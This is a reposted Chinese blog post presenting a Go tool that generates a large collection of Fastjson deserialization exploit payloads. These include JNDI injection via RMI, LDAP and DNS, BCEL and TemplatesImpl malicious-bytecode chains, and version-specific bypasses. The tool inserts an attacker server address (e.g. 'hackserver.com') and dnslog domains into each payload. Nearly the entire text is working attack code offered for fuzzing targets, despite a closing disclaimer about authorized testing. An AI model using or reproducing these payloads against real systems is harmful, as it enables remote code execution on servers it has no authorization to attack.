Fastjson的payload收集-编程知识

Fastjson的payload收集

news/2024/11/15 22:21:11/文章来源:https://www.cnblogs.com/Aixve/p/18306568

What

无第三方依赖
收集了网络上的多种payload，方便进行fuzz测试
提供了自动替换payload的功能，一次性为所有payload插入rmi地址/dnslog

Help

--list：以清单的形式打印，方便作为字典进行fuzz

--address：服务器地址（无需rmi://前缀），如11.22.33.44/exp、eval.com/rce

--dns：dnslog的地址，不同payload会添加不同的子域名，方便查看是哪一条payload

--code：加载恶意类的code，需要自行添加$$BCEL$$的开头

Example

FjsonShowPload.exe --list --address hackserver.com --dns dnslog.com

FjsonShowPload.exe --address hackserver.com --dns dnslog.com

注意：重定向到文件后，需要去掉banner和结尾的确认信息，或者直接在代码中去除

How

将代码保存为 FjsonSoPload.go

进入命令行窗口：go build ./

即可得到一个 FjsonSoPload.exe

Code

package mainimport ("flag""fmt"
)var id = 1
var dt = false
var cl = true
var code string
var Address string
var dnslog string
var Pal, Hep, Vson stringfunc main() {fmt.Println(" ████████  ██                            ████████ ██                          ███████   ██                         ██\n░██░░░░░  ░░                            ██░░░░░░ ░██                         ░██░░░░██ ░██                        ░██\n░██        ██  ██████  ██████  ███████ ░██       ░██       ██████  ███     ██░██   ░██ ░██  ██████   ██████       ░██\n░███████  ░██ ██░░░░  ██░░░░██░░██░░░██░█████████░██████  ██░░░░██░░██  █ ░██░███████  ░██ ██░░░░██ ░░░░░░██   ██████\n░██░░░░   ░██░░█████ ░██   ░██ ░██  ░██░░░░░░░░██░██░░░██░██   ░██ ░██ ███░██░██░░░░   ░██░██   ░██  ███████  ██░░░██\n░██     ██░██ ░░░░░██░██   ░██ ░██  ░██       ░██░██  ░██░██   ░██ ░████░████░██       ░██░██   ░██ ██░░░░██ ░██  ░██\n░██    ░░███  ██████ ░░██████  ███  ░██ ████████ ░██  ░██░░██████  ███░ ░░░██░██       ███░░██████ ░░████████░░██████\n░░      ░░░  ░░░░░░   ░░░░░░  ░░░   ░░ ░░░░░░░░  ░░   ░░  ░░░░░░  ░░░    ░░░ ░░       ░░░  ░░░░░░   ░░░░░░░░  ░░░░░░ \n")detail := flag.Bool("list", false, "不展示payload细节与利用方式（默认展示）")code2 := flag.String("code", "恶意code", "恶意code,自行添加$$BCEL$$开头")dnslog2 := flag.String("dns", "default.com", "dnslog")Address2 := flag.String("address", "127.0.0.1/exp", "rmi/ldap地址（无需带协议名）")flag.Parse()dt = !(*detail)dnslog = *dnslog2code = *code2Address = *Address2defer fmt.Println("\nYour input :", dnslog, " | ", Address)//两个版本tomcat的BasicDataSource__bcelShow_org_apache_tomcat_dbcp_dbcp_BasicDataSource()//JdbcRowSetImpl__jndiShow_com_sun_rowset_JdbcRowSetImpl()//JdbcRowSetImpl__jndi__bypass1.2.25Bypass25_41_com_sun_rowset_JdbcRowSetImpl()//JdbcRowSetImpl__jndi__bypass1.2.41--1.2.42Bypass41_42_com_sun_rowset_JdbcRowSetImpl()//缓存绕过< 1.2.47//{ "a": { "@type": "java.lang.Class",  "val": "com.sun.rowset.JdbcRowSetImpl"},  "b": { "@type": "com.sun.rowset.JdbcRowSetImpl",  "dataSourceName": "rmi://ip:9999/exp",  "autoCommit": true}}//bcel链的绕过Bypass25_41_BasicDataSource()other()//fmt.Println("\nspring\\tomcat Echo")}func Show_org_apache_tomcat_dbcp_dbcp_BasicDataSource() {Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`Hep = `BCEL加载恶意字节码的利用链，正连加载恶意字节码，无需出网`Vson = `Fastjson <= 1.2.24、tomcat-dbcp <= 7、JDK < 8u251`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource","driverClassLoader":{"@type":"com.sun.org.apache.bcel.internal.util.ClassLoader"},"driverClassName":"` + code + `"}`Hep = `BCEL加载恶意字节码的利用链，正连加载恶意字节码，无需出网`Vson = `Fastjson <= 1.2.24、tomcat-dbcp > 7、JDK < 8u251`ShowPayload(Pal, Hep, Vson)
}func Show_com_sun_rowset_JdbcRowSetImpl() {//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}Pal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}`Hep = `JNDI注入-RMI利用链exp，反连`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)//ldapPal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}`Hep = `JNDI注入-ldap利用链exp，反连`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)//dnslogPal = `{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://poc1.` + dnslog + `","autoCommit":true}`Hep = `JNDI注入-DNSlog利用链poc，请求dnslog`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)
}func Bypass25_41_BasicDataSource() {//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`Hep = `BCEL利用链exp，正连，类名前后加L与;进行绕过`Vson = `Fastjson < 1.2.41`ShowPayload(Pal, Hep, Vson)}func other() {//{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"$type$://$ip$/payload2","autoCommit":true}} #Fastjson <=1.2.24Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"rmi://` + Address + `","autoCommit":true}}`Hep = `JNDI注入`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://` + Address + `","autoCommit":true}}`Hep = `JNDI注入`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)Pal = `{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"dns://ubm.` + dnslog + `","autoCommit":true}}`Hep = `JNDI注入-dnslog`Vson = `Fastjson <= 1.2.24`ShowPayload(Pal, Hep, Vson)//{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload3","autoCommit":true} #Fastjson<=1.2.41//{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"$type$://$ip$/payload4","autoCommit":true} #Fastjson<=1.2.42//{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"$type$://$ip$/payload5","autoCommit":true} #Fastjson<=1.2.43Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"rmi://` + Address + `","autoCommit":true}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.43`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"ldap://` + Address + `","autoCommit":true}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.43`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{,"dataSourceName":"dns://mik.` + dnslog + `","autoCommit":true}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.43`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"$type$://$ip$/payload6"}} #Fastjson<=1.2.45Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.45`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.45`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"dns://jds.` + dnslog + `"}}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.45`ShowPayload(Pal, Hep, Vson)//{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"$type$://$ip$/payload7","autoCommit":true}} #Fastjson<=1.2.47Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://` + Address + `","autoCommit":true}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.47`ShowPayload(Pal, Hep, Vson)Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://` + Address + `","autoCommit":true}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.47`ShowPayload(Pal, Hep, Vson)Pal = `{"a":{"@type": "java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type": "com.sun.rowset.JdbcRowSetImpl","dataSourceName":"dns://dbjn.` + dnslog + `","autoCommit":true}}`Hep = `dnsliog`Vson = `Fastjson<=1.2.47`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"$type$://$ip$/payload8"} #Fastjson<=1.2.62,CVE-2020-8840Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.62`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.62`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.xbean.propertyeditor.JndiConverter","AsText":"dns://cben.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.62`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"$type$://$ip$/payload9"} #Fastjson<=1.2.66Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"dns://igjt.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"$type$://$ip$/payload10"} #Fastjson<=1.2.66Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"dns://atbc.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload11"}} #Fastjson<=1.2.66Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"dns://eget.` + dnslog + `"}}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.66`ShowPayload(Pal, Hep, Vson)//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload12"} #Fastjson<=1.2.67Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"dns://antr.` + dnslog + `"}`Hep = `dnslog`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["$type$://$ip$/payload13"],"Realms":[""]} #Fastjson<=1.2.67Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["rmi://` + Address + `"],"Realms":[""]}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://` + Address + `"],"Realms":[""]}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["dns://siro.` + dnslog + `"],"Realms":[""]}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)//{"@type":"com.caucho.config.types.ResourceRef","lookupName":"$type$://$ip$/payload14"} #Fastjson<=1.2.67Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.caucho.config.types.ResourceRef","lookupName":"dns://caco.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)//{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"$type$://$ip$/payload15"}} #Fastjson<=1.2.67Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"rmi://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"ldap://` + Address + `"}}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties":{"@type":"java.util.Properties","UserTransaction":"dns://jti.` + dnslog + `"}}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.67`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"$type$://$ip$/payload16"} #Fastjson<=1.2.68Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"dns://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"rmi://w9.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"$type$://$ip$/payload17"} #Fastjson<=1.2.68Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"rmi://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://` + Address + `"}`Hep = `JNDI注入-exp`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"dns://ppx.` + dnslog + `"}`Hep = `JNDI注入-dnslog`Vson = `Fastjson<=1.2.68`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"$type$://$ip$/payload18"} #未知Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://` + Address + `"}`Hep = `jndi`Vson = `未知`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"ldap://` + Address + `"}`Hep = `jndi`Vson = `未知`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"dns://cons.` + dnslog + `"}`Hep = `dnslog`Vson = `未知`ShowPayload(Pal, Hep, Vson)//{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"$type$://$ip$/payload19","rollbackOnly":null} #未知Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"rmi://` + Address + `","rollbackOnly":null}`Hep = `jndi`Vson = `未知`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"ldap://` + Address + `","rollbackOnly":null}`Hep = `jndi`Vson = `未知`ShowPayload(Pal, Hep, Vson)Pal = `{"@type":"org.apache.openjpa.ee.RegistryManagedRuntime","registryName":"dns://openjpa.` + dnslog + `","rollbackOnly":null}`Hep = `dnslog`Vson = `未知`ShowPayload(Pal, Hep, Vson)//{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"$type$://$ip$/payload20"} #未知Pal = `{"@type": "Lorg.apache.tomcat.dbcp.dbcp2.BasicDataSource;","driverClassLoader": {"@type": "Lcom.sun.org.apache.bcel.internal.util.ClassLoader;"},"driverClassName": "` + code + `"}`Hep = `bcel`Vson = `未知`ShowPayload(Pal, Hep, Vson)//{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}Pal = `{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`Hep = `加载恶意类`Vson = `未知`ShowPayload(Pal, Hep, Vson)//TemplatesImpl2.tpl://{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["###EVIL_CODE###"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}Pal = `{"@type":"org.apache.xalan.xsltc.trax.TemplatesImpl","_bytecodes":["` + code + `"],'_name':'a.b','_tfactory':{ },"_outputProperties":{ },"_name":"a","_version":"1.0","allowedProtocols":"all"}`Hep = `加载恶意类`Vson = `未知`ShowPayload(Pal, Hep, Vson)
}func Bypass25_41_com_sun_rowset_JdbcRowSetImpl() {//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}Pal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`Hep = `JNDI注入-RMI利用链exp，反连，类名前后加L与;进行绕过`Vson = `Fastjson < 1.2.41`ShowPayload(Pal, Hep, Vson)//ldapPal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`Hep = `JNDI注入-ldap利用链exp，反连，类名前后加L与;进行绕过`Vson = `Fastjson < 1.2.41`ShowPayload(Pal, Hep, Vson)//dnslogPal = `{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`Hep = `JNDI注入-DNSlog利用链poc，请求dnslog，类名前后加L与;进行绕过`Vson = `Fastjson < 1.2.41`ShowPayload(Pal, Hep, Vson)
}func Bypass41_42_com_sun_rowset_JdbcRowSetImpl() {//{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":true}Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://` + Address + `","autoCommit":true}`Hep = `JNDI注入-RMI利用链exp，反连，类名前后双写L与;进行绕过`Vson = ` 1.2.41 <= Fastjson < 1.2.42`ShowPayload(Pal, Hep, Vson)//ldapPal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`Hep = `JNDI注入-ldap利用链exp，反连，类名前后双写L与;进行绕过`Vson = `1.2.41 <= Fastjson < 1.2.42`ShowPayload(Pal, Hep, Vson)//dnslogPal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`Hep = `JNDI注入-DNSlog利用链poc，请求dnslog，类名前后双写L与;进行绕过`Vson = `1.2.41 <= Fastjson < 1.2.42`ShowPayload(Pal, Hep, Vson)
}func ShowPayload(str ...string) {const redColor = "\033[31m"const resetColor = "\033[0m"if dt {fmt.Println("┌─────────PayloadID:", id)id++fmt.Printf("%s%s%s\n", redColor, str[0], resetColor)} else {fmt.Println(str[0])}if dt {fmt.Println("│\n├───[+]payload说明:")fmt.Print("│	")fmt.Println(str[1])defer fmt.Println("└──────────────────────────────────────────────────────────────────────────────┘\n")}if dt {fmt.Println("│\n├───[+]验证过的版本:")fmt.Print("│	")fmt.Println(str[2])fmt.Println("│	注:版本号仅供参考                                        Fastjson SEC──┐") //}
}

相信国家相信党，黑客没有好下场
请遵守相关法律法规，文中技术仅用于有授权的安全测试，禁止用于非法活动！
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中，您应确保自己的所有行为符合当地法律法规，且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/745066.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！